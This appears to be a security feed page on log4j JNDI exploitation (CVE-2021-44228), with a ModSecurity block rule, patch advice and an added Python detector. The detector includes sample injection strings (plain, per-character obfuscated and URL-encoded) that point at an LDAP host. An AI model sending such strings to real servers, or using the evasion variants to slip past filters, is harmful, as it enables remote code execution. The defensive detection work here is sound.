log4j (JNDI) attack feed

Honeypot captures of CVE-2021-44228 exploitation attempts. Matching IPs are auto-added to the web_attacks blocklist in real time.

CVE: CVE-2021-44228 (CVSS 10.0 · Critical)
Probes shown: 40 (last 450 kB of log)
Unique source IPs: 13 (in shown window)
Disclosed: Dec 2021 (still actively scanned)

Live JNDI payloads

parsed from WAF · sensitive IPs anonymized to a.b.c.d

WAF rule · drop on match

ModSecurity v3
# Block any request containing a JNDI lookup.
# Outpost-curated.
SecRule REQUEST_URI|REQUEST_HEADERS|ARGS \
    "@rx \$\{(\$\{[^}]+\}|j)ndi:" \
    "id:920470,phase:2,deny,status:403,msg:'log4j JNDI attempt',tag:'cve/CVE-2021-44228'"
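
The rule's pattern covers the literal `${jndi:` form and a single nested lookup in place of the leading `j`; run against a raw string, it does not match per-character or URL-encoded spellings. The following is an added example, not part of the original page or its rule set: a log-side check that URL-decodes and collapses nested lookups before matching. The names `normalize`, `is_jndi_probe` and `SAMPLES` are hypothetical, the sample strings are constructed, and every lookup with a `:-` default is assumed to fall back to that default.

```python
import re
from urllib.parse import unquote

# The page's ModSecurity pattern, kept verbatim for comparison.
PAGE_RULE = re.compile(r"\$\{(\$\{[^}]+\}|j)ndi:")
# An innermost ${...} expression: its body contains no further braces.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_PASSES = 10  # bound the work done on hostile input

def _resolve(match):
    """Replace one innermost lookup with the text it is assumed to yield."""
    body = match.group(1)
    head, _, rest = body.partition(":")
    head = head.strip().lower()
    if head == "jndi":
        return match.group(0)  # keep it so the final search sees it
    if head in ("lower", "upper"):
        return getattr(rest, head)()
    if ":-" in body:  # ${anything:-default}: assume the default is used
        return body.split(":-", 1)[1]
    return ""  # any other lookup: assumed to contribute nothing

def _until_stable(step, value):
    """Apply step repeatedly until the value stops changing."""
    for _ in range(MAX_PASSES):
        nxt = step(value)
        if nxt == value:
            break
        value = nxt
    return value

def normalize(value):
    """URL-decode, then collapse nested lookups from the inside out."""
    value = _until_stable(unquote, value)
    return _until_stable(lambda v: INNERMOST.sub(_resolve, v), value)

def is_jndi_probe(value):
    return bool(JNDI.search(normalize(value)))

# Constructed samples; 192.0.2.1 is a documentation address (RFC 5737).
SAMPLES = {
    "plain": "${jndi:ldap://192.0.2.1:1389/a}",
    "per_char": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://192.0.2.1/a}",
    "encoded": "/$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://192.0.2.1/a%7D",
    "benign": "Mozilla/5.0 (X11; Linux x86_64) ${HOME}",
}
```

Comparing `PAGE_RULE.search(s)` with `is_jndi_probe(s)` over `SAMPLES` shows which spellings need normalization before the pattern can see them.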

What to patch

FIX: Upgrade log4j ≥ 2.17.1
Earlier 2.x releases still allow lookups via nested patterns; only 2.17.1 fully removes them.

FIX: Disable JNDI lookups in formatMsg
Set log4j2.formatMsgNoLookups=true as a defense in depth.

FIX: Block outbound LDAP / RMI
Restrict outbound to known peers so a successful injection can't reach an attacker server.